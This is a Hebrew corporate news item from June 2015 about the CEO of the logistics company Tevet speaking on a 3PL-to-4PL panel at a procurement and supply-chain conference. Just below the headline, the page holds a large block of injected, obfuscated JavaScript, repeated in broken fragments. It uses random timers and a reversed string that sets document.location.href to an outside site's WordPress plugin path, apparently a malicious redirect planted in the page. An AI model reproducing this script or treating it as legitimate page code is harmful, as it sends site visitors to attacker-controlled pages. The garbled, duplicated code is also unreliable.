טבת בועידה ה-6 לרכש – חדשות יוני 2015

טבת בוועידה ה- 6 לרכש, לוגיסטיקה ושרשרת אספקה 2015 :
andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}salc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}salc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}salc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}salc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}panel1.640andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}salc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}salc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

בתאריך 30.4.15 התקיימה הוועידה ה- 6 לרכש, לוגיסטיקה ושרשרת אספקה במסגרת הוועידה דדו מסיקה, מנכ"ל ובעלים הקבוצה השתתף בפאנל , בו דובר על מעבר מ- 3PL ל -4PL , בפאנל השתתפו בכירים נוספים מעולם הלוגיסטיקה. דדו , סיפר בפאנל כי טבת הוקמה לפני כ-20 שנה והיא מעסיקה, יותר מ- 300 עובדים. לאחר שהתנסו בכל ההתפתחויות וקפיצות המדרגה שעבר ענף הלוגיסטיקה בארץ בכלל והשירותים הלוגיסטיים – ברמות מעורבות שונות – מאז ועד היום, כעת הסחר האלקטרוני כבר נושף בעורפם. לדעתו, אגב, אין כיום בישראל חברה שיודעת להפעיל היטב סחר אלקטרוני, ונדרשות לכך תשתיות שונות ומשאבים בסדרי גודל שונים. "היום TPL זה כבר לא רק מחסן" הוא אומר, זה כל מה שהלקוח רוצה ומאמין שאנחנו נעשה טוב יותר, אפילו ניהול קשרי לקוחות (עםמחסן חלפים נדרשים).
למנכ"ל הלקוח פשוט כדאי להתמקד רק בליבת העסק שלו. אנחנו משקיעים ומביאים המון ידע בתחום, עם חטיבות הנדסה ומחשוב שמשקיעה מיליונים במערכות מידע. הודות להתמחות שלנו, לגמישות התפעולית (בפסח למשל סיפקנו עבור חברה מסוימת 3 מיליון פריטים תוך שבועיים) הלקוח מקבל יותר וכך אנו מסוגלים להיות יעילים מאד, זולים, וגם להרוויח. לעומת זאת חברות TPL קטנות ובינוניות, הוא
מוסיף, לא בהכרח ישקיעו במערכות מידע והנדסה כאלו. בשנים האחרונות ראינו שהוקמו בארץ המון מרלו"גים חדשים, 'כפטריות אחר הגשם', היו הרבה משקיעים עם כסף שנמשכו לנדל"ן לוגיסטי – אבל נכשלו בתפעולם והפסידו. "ראיתי הרבה קטסטרופות" הוא אומר, הם לא יודעים לנהל ולתפעל את המרלו"גים הללו וכאן אנו נכנסים לתמונה ומציעים את הפתרון המיטבי. כי יש לנו את יכולת האינטגרציה בין כל תחומי הידע הנדרשים (לדעתו הדבר מזכיר את מה שהציעה בזמנו חברת פתאל למשקיעים בבתי מלון).
מגמה שמתרחבת כיום היא של מסירת הניהול הלוגיסטי גם בתוך המפעלים (גם שירותי ייצור מובהקים בתוך המפעלים) לספק לוגיסטי, כולל ניהול חומר וניהול הערך המכונה : On-site logistics ולעתים אנו מנהלים שם את כל שרשרת האספקה של המפעל.
לקישור לסרטון המלא לחצו כאן.
לידיעון המלא לודש יוני לחצו כאן.